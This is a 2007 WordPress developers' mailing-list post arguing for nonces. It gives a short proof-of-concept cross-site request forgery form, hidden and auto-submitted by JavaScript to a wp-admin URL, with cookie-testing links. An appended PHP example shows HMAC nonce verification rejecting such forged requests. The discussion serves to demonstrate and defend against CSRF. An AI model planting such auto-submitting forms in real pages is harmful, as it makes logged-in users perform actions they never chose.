[wp-hackers] Any other way to do it? (or, do we really need Nonces?)
    Robert Deaton
    false.hopes at gmail.com
    Sat Mar  3 15:59:07 GMT 2007

On 3/3/07, Elliotte Harold <elharo at metalab.unc.edu> wrote:
> However I would like to see a specific proof of concept of a JavaScript
> that submits a POST to a 3rd party site with authentication cookies intact.

<form name="bar" target="foo" method="post"
action="http://yoursite/wp-admin/bad-script.php" style="display:none">
<input type="hidden" name="var1" value="value1"/>
<input type="hidden" name="var2" value="value2"/>
<input type="hidden" name="var3" value="value3"/>
<input type="submit" name="weneedthistosubmit"/>
</form>
<script type="text/javascript">
document.forms['bar'].submit();
</script>

This particular incarnation is borrowed from earlier in the thread.
This one does work; however, it will more likely than not trigger your
popup blockers. Test it and let it through, though, then remember that
all it takes is clicking a link and your popup blocker won't have a
thing to say.

The following are to help you test it. This sets a semi-random cookie:
http://lushlab.com/setcookie.php

This one var_dump()s $_POST and $_COOKIE:
http://lushlab.com/test.php

-- 
--Robert Deaton
http://lushlab.com
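
The server-side check that makes an auto-submitted cross-site POST like the one above fail, as an added example that is not part of the original post and is not WordPress's own nonce code. The names `make_nonce`, `verify_nonce`, `handle_post`, the `_nonce` field, the `delete-post` action, the secret and the session ids are all assumptions made for illustration.

```php
<?php
// Simplified action nonce (added example, not WordPress's implementation).
// SECRET, LIFETIME, the session ids and the action name are constructed.
const SECRET = 'constructed-server-side-secret';
const LIFETIME = 86400; // assumed validity window in seconds

// HMAC over (time tick, action, session): bound to one user and one action,
// and not computable by a third-party page that lacks SECRET.
function make_nonce(string $action, string $session, ?int $now = null): string {
    $tick = intdiv($now ?? time(), LIFETIME);
    return hash_hmac('sha256', "$tick|$action|$session", SECRET);
}

// Accept the current and previous tick so a nonce issued just before a
// tick boundary does not expire immediately.
function verify_nonce(string $nonce, string $action, string $session, ?int $now = null): bool {
    $tick = intdiv($now ?? time(), LIFETIME);
    foreach ([$tick, $tick - 1] as $t) {
        // hash_equals() compares in constant time.
        if (hash_equals(hash_hmac('sha256', "$t|$action|$session", SECRET), $nonce)) {
            return true;
        }
    }
    return false;
}

// State-changing handler: the session cookie alone is not sufficient.
function handle_post(array $cookie, array $post): string {
    $session = $cookie['session'] ?? '';
    if ($session === '') {
        return '403 not logged in';
    }
    $nonce = is_string($post['_nonce'] ?? null) ? $post['_nonce'] : '';
    if (!verify_nonce($nonce, 'delete-post', $session)) {
        return '403 missing or invalid nonce';
    }
    return '200 action performed';
}

$cookie = ['session' => 'constructed-session-id-1'];
// 1. Cross-site form: the browser attaches the cookie, but the foreign
//    page had no way to read a nonce, so the field is absent.
echo handle_post($cookie, ['var1' => 'value1']), "\n";

// 2. Form rendered by the site itself, which embedded a fresh nonce.
$own = ['var1' => 'value1', '_nonce' => make_nonce('delete-post', $cookie['session'])];
echo handle_post($cookie, $own), "\n";

// 3. A nonce issued for a different session does not transfer.
echo handle_post($cookie, ['_nonce' => make_nonce('delete-post', 'constructed-session-id-2')]), "\n";
```

Only the second request passes: the cookie travels with all three, so the nonce is what distinguishes a form the site rendered for this user from one submitted by another page.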